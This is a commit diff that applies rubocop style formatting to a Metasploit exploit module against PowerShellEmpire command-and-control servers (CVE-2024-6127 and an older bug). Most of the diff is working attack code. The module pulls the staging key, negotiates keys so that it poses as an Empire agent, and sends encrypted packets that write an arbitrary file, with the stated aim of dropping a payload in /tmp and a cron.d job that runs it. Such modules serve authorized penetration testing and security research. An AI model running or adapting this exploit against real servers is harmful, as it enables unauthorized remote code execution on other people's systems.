rubocop formatting

Author: Takahiro-Yoko

modules/exploits/linux/http/empire_skywalker.rb

@@ -19,53 +19,52 @@ class MetasploitModule < Msf::Exploit::Remote
   TASK_DOWNLOAD = 41
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'            => 'PowerShellEmpire Arbitrary File Upload (Skywalker)',
-      'Description'     => %q{
-        A vulnerability existed in
-        the new Empire (maintained by BC Security) prior to commit e73e883 (<v5.9.3) or
-        the original PowerShellEmpire server prior to commit f030cf62
-        which would allow an arbitrary file to be written to an
-        attacker controlled location with the permissions of the Empire server.
-
-        This exploit will write the payload to /tmp/ directory followed by a
-        cron.d file to execute the payload.
-      },
-      'Author'          =>
-        [
-          'Spencer McIntyre',   # Vulnerability discovery & original Metasploit module
+    super(
+      update_info(
+        info,
+        'Name' => 'PowerShellEmpire Arbitrary File Upload (Skywalker)',
+        'Description' => %q{
+          A vulnerability existed in
+          the new Empire (maintained by BC Security) prior to commit e73e883 (<v5.9.3) or
+          the original PowerShellEmpire server prior to commit f030cf62
+          which would allow an arbitrary file to be written to an
+          attacker controlled location with the permissions of the Empire server.
+
+          This exploit will write the payload to /tmp/ directory followed by a
+          cron.d file to execute the payload.
+        },
+        'Author' => [
+          'Spencer McIntyre', # Vulnerability discovery & original Metasploit module
           'Erik Daguerre',      # Original Metasploit module
           'ACE-Responder',      # Patch bypass discovery & Python PoC
           'Takahiro Yokoyama'   # Update Metasploit module
         ],
-      'License'         => MSF_LICENSE,
-      'References'      => [
-        ['CVE', '2024-6127'], # patch bypass
-        ['URL', 'https://blog.harmj0y.net/empire/empire-fails/'], # original http://www.harmj0y.net/blog/empire/empire-fails/ is not found.
-        ['URL', 'https://aceresponder.com/blog/exploiting-empire-c2-framework'], # patch bypass
-        ['URL', 'https://github.com/ACE-Responder/Empire-C2-RCE-PoC/tree/main'] # patch bypass
-      ],
-      'Payload'         =>
-        {
-          'DisableNops' => true,
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-6127'], # patch bypass
+          ['URL', 'https://blog.harmj0y.net/empire/empire-fails/'], # original http://www.harmj0y.net/blog/empire/empire-fails/ is not found.
+          ['URL', 'https://aceresponder.com/blog/exploiting-empire-c2-framework'], # patch bypass
+          ['URL', 'https://github.com/ACE-Responder/Empire-C2-RCE-PoC/tree/main'] # patch bypass
+        ],
+        'Payload' => {
+          'DisableNops' => true
         },
-      'Platform'        => %w{ linux python },
-      'Targets'         =>
-        [
+        'Platform' => %w[linux python],
+        'Targets' => [
           [ 'Python', { 'Arch' => ARCH_PYTHON, 'Platform' => 'python' } ],
           [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],
           [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ]
         ],
-      'DefaultOptions'  => { 'WfsDelay' => 75 },
-      'DefaultTarget'   => 0,
-      'DisclosureDate'  => '2016-10-15',
-      'Notes'           =>
-        {
-          'Stability'   => [ CRASH_SAFE, ],
+        'DefaultOptions' => { 'WfsDelay' => 75 },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2016-10-15',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
           'SideEffects' => [ ARTIFACTS_ON_DISK, ],
-          'Reliability' => [ REPEATABLE_SESSION, ],
-        },
-    ))
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
 
     register_options(
       [
@@ -79,7 +78,8 @@ def initialize(info = {})
         OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2024-6127', ['CVE-2024-6127', 'Original']]),
         OptString.new('STAGE_PATH', [ true, 'The Empire\'s staging path, default is login/process.php', 'login/process.php' ]),
         OptString.new('AGENT', [ true, 'The Empire\'s communication profile agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'])
-      ])
+      ]
+    )
   end
 
   def check
@@ -88,7 +88,7 @@ def check
     Exploit::CheckCode::Appears
   end
 
-  def aes_encrypt(key, data, include_mac=false)
+  def aes_encrypt(key, data, include_mac: false)
     cipher = OpenSSL::Cipher.new('aes-256-cbc')
     cipher.encrypt
     iv = cipher.random_iv
@@ -102,8 +102,8 @@ def aes_encrypt(key, data, include_mac=false)
     data
   end
 
-  def create_packet(res_id, data, counter=nil)
-    data = Rex::Text::encode_base64(data)
+  def create_packet(res_id, data, counter = nil)
+    data = Rex::Text.encode_base64(data)
     counter = Time.new.to_i if counter.nil?
 
     [ res_id, counter, data.length ].pack('VVV') + data
@@ -112,53 +112,55 @@ def create_packet(res_id, data, counter=nil)
   def reversal_key
     # reversal key for commit da52a626 (March 3rd, 2016) - present (September 21st, 2016)
     [
-      [ 160, 0x3d], [  33, 0x2c], [  34, 0x24], [ 195, 0x3d], [ 260, 0x3b], [  37, 0x2c], [  38, 0x24], [ 199, 0x2d],
-      [   8, 0x20], [  41, 0x3d], [  42, 0x22], [ 139, 0x22], [ 108, 0x2e], [ 173, 0x2e], [  14, 0x2d], [  47, 0x29],
-      [ 272, 0x5d], [ 113, 0x3b], [  82, 0x3b], [  51, 0x2d], [ 276, 0x2e], [ 213, 0x2e], [  86, 0x2d], [ 183, 0x3a],
-      [  24, 0x7b], [  57, 0x2d], [ 282, 0x20], [  91, 0x20], [  92, 0x2d], [ 157, 0x3b], [  30, 0x28], [  31, 0x24]
+      [ 160, 0x3d], [ 33, 0x2c], [ 34, 0x24], [ 195, 0x3d], [ 260, 0x3b], [ 37, 0x2c], [ 38, 0x24], [ 199, 0x2d],
+      [ 8, 0x20], [ 41, 0x3d], [ 42, 0x22], [ 139, 0x22], [ 108, 0x2e], [ 173, 0x2e], [ 14, 0x2d], [ 47, 0x29],
+      [ 272, 0x5d], [ 113, 0x3b], [ 82, 0x3b], [ 51, 0x2d], [ 276, 0x2e], [ 213, 0x2e], [ 86, 0x2d], [ 183, 0x3a],
+      [ 24, 0x7b], [ 57, 0x2d], [ 282, 0x20], [ 91, 0x20], [ 92, 0x2d], [ 157, 0x3b], [ 30, 0x28], [ 31, 0x24]
     ]
   end
 
   def rsa_encode_int(value)
     encoded = []
-    while value > 0 do
+    while value > 0
       encoded << (value & 0xff)
       value >>= 8
     end
 
-    Rex::Text::encode_base64(encoded.reverse.pack('C*'))
+    Rex::Text.encode_base64(encoded.reverse.pack('C*'))
   end
 
   def rsa_key_to_xml(rsa_key)
-    rsa_key_xml  = "<RSAKeyValue>\n"
-    rsa_key_xml << "  <Exponent>#{ rsa_encode_int(rsa_key.e.to_i) }</Exponent>\n"
-    rsa_key_xml << "  <Modulus>#{ rsa_encode_int(rsa_key.n.to_i) }</Modulus>\n"
-    rsa_key_xml << "</RSAKeyValue>"
+    rsa_key_xml = "<RSAKeyValue>\n"
+    rsa_key_xml << "  <Exponent>#{rsa_encode_int(rsa_key.e.to_i)}</Exponent>\n"
+    rsa_key_xml << "  <Modulus>#{rsa_encode_int(rsa_key.n.to_i)}</Modulus>\n"
+    rsa_key_xml << '</RSAKeyValue>'
 
     rsa_key_xml
   end
 
   def get_staging_key
     # patch bypass
     if datastore['CVE'] == 'CVE-2024-6127'
-        res = send_request_cgi({
-          'method'    => 'GET',
-          'uri'       => normalize_uri(target_uri.path, 'download/python/')
-        })
-        return unless res and res.code == 200
-        match = /IV\+\'(.*)\'\.encode/.match(res.body)
-        return match[1].bytes if match
-        return
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'download/python/')
+      })
+      return unless res && res.code == 200
+
+      match = /IV\+'(.*)'\.encode/.match(res.body)
+      return match[1].bytes if match
+
+      return
     end
 
     # STAGE0_URI resource requested by the initial launcher
     # The default STAGE0_URI resource is index.asp
     # https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L34
     res = send_request_cgi({
-      'method'    => 'GET',
-      'uri'       => normalize_uri(target_uri.path, datastore['STAGE0_URI'])
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, datastore['STAGE0_URI'])
     })
-    return unless res and res.code == 200
+    return unless res && res.code == 200
 
     staging_key = Array.new(32, nil)
     staging_data = res.body.bytes
@@ -194,24 +196,24 @@ def write_file(path, data, session_id, session_key, opts)
       [
         '0',
         session_id + path,
-        Rex::Text::encode_base64(data)
+        Rex::Text.encode_base64(data)
       ].join('|'),
       server_epoch
     )
 
     if datastore['PROFILE'].blank?
-      profile_uri = normalize_uri(target_uri.path, %w{ admin/get.php news.asp login/process.jsp }.sample)
+      profile_uri = normalize_uri(target_uri.path, %w[admin/get.php news.asp login/process.jsp].sample)
     else
       profile_uri = normalize_uri(target_uri.path, datastore['PROFILE'])
     end
 
     res = send_request_cgi({
-      'cookie'    => "SESSIONID=#{session_id}",
-      'data'      => aes_encrypt(session_key, data, include_mac=true),
-      'method'    => 'POST',
-      'uri'       => normalize_uri(profile_uri)
+      'cookie' => "SESSIONID=#{session_id}",
+      'data' => aes_encrypt(session_key, data, include_mac: true),
+      'method' => 'POST',
+      'uri' => normalize_uri(profile_uri)
     })
-    fail_with(Failure::Unknown, "Failed to write file") unless res and res.code == 200
+    fail_with(Failure::Unknown, 'Failed to write file') unless res && res.code == 200
 
     res
   end
@@ -246,31 +248,31 @@ def exploit
 
       # stage1
       private_key = SecureRandom.hex(KEYLENGTH).hex
-      public_key = GENERATOR.pow(private_key, PRIME).to_s.encode("UTF-8")
+      public_key = GENERATOR.pow(private_key, PRIME).to_s.encode('UTF-8')
       res = send_data_to_stage(staging_key, public_key, staging_key, STAGE1, session_id)
-      fail_with(Failure::Unknown, 'Failed to send the key to STAGE1') unless res and res.code == 200
-      vprint_good("Successfully sent the key to STAGE1")
+      fail_with(Failure::Unknown, 'Failed to send the key to STAGE1') unless res && res.code == 200
+      vprint_good('Successfully sent the key to STAGE1')
 
       # decrypt the response and pull out the epoch and session_key
       packet = aes_decrypt(staging_key, res.body)
       nonce = packet[..15].to_i
       server_pub = packet[16..].to_i
-      sharedSecret = server_pub.pow(private_key, PRIME)
+      shared_secret = server_pub.pow(private_key, PRIME)
       # https://github.com/BC-SECURITY/Empire/blob/8aca42747da6cf2b0def7edede94586f6b3258e8/empire/server/common/encryption.py#L373
       # _sharedSecretBytes = self.sharedSecret.to_bytes(
       #   len(bin(self.sharedSecret)) - 2 // 8 + 1, byteorder="big"
       # )
       # 2(0b) + 1(- 2 // 8 + 1) = 3
-      _sharedSecret = to_bytes(sharedSecret, sharedSecret.to_s(2).length + 3, little_endian=false)
+      shared_secret = to_bytes(shared_secret, shared_secret.to_s(2).length + 3)
       sha = OpenSSL::Digest.new('sha256')
-      sha.update(_sharedSecret)
+      sha.update(shared_secret)
       session_key = sha.digest
       print_good('Successfully negotiated an artificial Empire agent')
 
       # stage2
-      sysinfo = "#{nonce+1}|#{datastore['RHOSTS']}:#{datastore['RPORT']}||:^)|:^}|127.0.1.1|:^)|False|rekt.py|2603444|python|3.11|x86_64".encode("UTF-8")
+      sysinfo = "#{nonce + 1}|#{datastore['RHOSTS']}:#{datastore['RPORT']}||:^)|:^}|127.0.1.1|:^)|False|rekt.py|2603444|python|3.11|x86_64".encode('UTF-8')
       res = send_data_to_stage(session_key, sysinfo, staging_key, STAGE2, session_id)
-      fail_with(Failure::Unknown, "Failed to communicate with STAGE2") unless res and res.code == 200
+      fail_with(Failure::Unknown, 'Failed to communicate with STAGE2') unless res && res.code == 200
       aes_decrypt(session_key, res.body)
 
       opts = { staging_key: staging_key }
@@ -283,18 +285,18 @@ def exploit
       # The default STAGE1_URI resource is index.jsp
       # https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L37
       res = send_request_cgi({
-        'cookie'    => "SESSIONID=#{session_id}",
-        'data'      => aes_encrypt(staging_key, rsa_key_to_xml(rsa_key)),
-        'method'    => 'POST',
-        'uri'       => normalize_uri(target_uri.path, datastore['STAGE1_URI'])
+        'cookie' => "SESSIONID=#{session_id}",
+        'data' => aes_encrypt(staging_key, rsa_key_to_xml(rsa_key)),
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, datastore['STAGE1_URI'])
       })
-      fail_with(Failure::Unknown, 'Failed to send the RSA key') unless res and res.code == 200
-      vprint_good("Successfully sent the RSA key")
+      fail_with(Failure::Unknown, 'Failed to send the RSA key') unless res && res.code == 200
+      vprint_good('Successfully sent the RSA key')
 
       # decrypt the response and pull out the epoch and session_key
       body = rsa_key.private_decrypt(res.body)
       server_epoch = body[0..9].to_i
-      session_key = body[10..-1]
+      session_key = body[10..]
       print_good('Successfully negotiated an artificial Empire agent')
 
       opts = { server_epoch: server_epoch }
@@ -323,7 +325,7 @@ def exploit
     print_status("Writing cron job to #{cron_path}")
 
     write_file(cron_path, cron_file(cron_command), session_id, session_key, opts)
-    print_status("Waiting for cron job to run, can take up to 60 seconds")
+    print_status('Waiting for cron job to run, can take up to 60 seconds')
 
     register_files_for_cleanup(cron_path)
     register_files_for_cleanup(payload_path)
@@ -341,7 +343,7 @@ def build_routing_packet(staging_key, meta = 0, enc_data = ''.b, session_id = '0
   end
 
   def aes_encrypt_then_hmac(key, data)
-    data = aes_encrypt(key, data, include_mac=false)
+    data = aes_encrypt(key, data)
     mac = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), key, data)
     data + mac[..9]
   end
@@ -351,11 +353,12 @@ def aes_decrypt(key, data)
     sha256_digest = OpenSSL::Digest.new('sha256')
     expected = OpenSSL::HMAC.digest(sha256_digest, key, data[..-11])[..9]
     unless OpenSSL::HMAC.digest(sha256_digest, key, mac) == OpenSSL::HMAC.digest(sha256_digest, key, expected)
-      raise "Invalid ciphertext received."
+      raise 'Invalid ciphertext received.'
     end
 
     size = key.length * 8
-    raise ArgumentError.new('AES key width must be 128 or 256 bits') unless (size == 128 || size == 256)
+    fail_with(Failure::Unknown, 'AES key width must be 128 or 256 bits') unless size == 128 || size == 256
+
     # Create the required cipher instance
     aes = OpenSSL::Cipher.new("AES-#{size}-CBC")
     # Generate a truly random IV
@@ -372,31 +375,30 @@ def aes_decrypt(key, data)
   def compress(data)
     start_crc32 = Zlib.crc32(data) & 0xFFFFFFFF
     comp_data = Zlib::Deflate.deflate(data)
-    Base64.strict_encode64([start_crc32].pack("N") + comp_data)
+    Base64.strict_encode64([start_crc32].pack('N') + comp_data)
   end
 
   def build_response_packet(tasking_id, packet_data)
-    packetType = [tasking_id].pack("S")
-    totalPacket = [1].pack("S")
-    packetNum = [1].pack("S")
-    result_id = [1].pack("S")
+    packet_type = [tasking_id].pack('S')
+    total_packet = [1].pack('S')
+    packet_num = [1].pack('S')
+    result_id = [1].pack('S')
     packet_data = Base64.strict_encode64(packet_data)
     if packet_data.length % 4 != 0
-      packet_data += "=" * (4 - packet_data.length % 4)
+      packet_data += '=' * (4 - packet_data.length % 4)
     end
-    length = [packet_data.length].pack("L")
-    packetType + totalPacket + packetNum + result_id + length + packet_data
+    length = [packet_data.length].pack('L')
+    packet_type + total_packet + packet_num + result_id + length + packet_data
   end
 
-  def to_bytes(n, length=1, little_endian=false)
+  def to_bytes(num, length = 1, little_endian: false)
     order = little_endian ? (0...length) : (0...length).to_a.reverse
-    bytes_array = order.map { |i| (n >> i * 8) & 0xff }
+    bytes_array = order.map { |i| (num >> i * 8) & 0xff }
     bytes_array.pack('C*')
   end
 
   def write_file_cve_2024_6127(path, data, session_id, session_key, staging_key)
-    path = path.split("/").join("\\")
-    encodedPart = compress(data)
+    path = path.split('/').join('\\')
     packet = build_response_packet(
       TASK_DOWNLOAD,
       [
@@ -413,10 +415,10 @@ def send_data_to_stage(session_key, packet, staging_key, task_id, session_id)
     enc_packet = aes_encrypt_then_hmac(session_key, packet)
     data = build_routing_packet(staging_key, task_id, enc_packet, session_id)
     res = send_request_cgi({
-      'data'      => data,
-      'method'    => 'POST',
-      'uri'       => normalize_uri(target_uri.path, datastore['STAGE_PATH']),
-      'headers' => {'Cookie' => datastore['AGENT']}
+      'data' => data,
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, datastore['STAGE_PATH']),
+      'headers' => { 'Cookie' => datastore['AGENT'] }
     })
     res
   end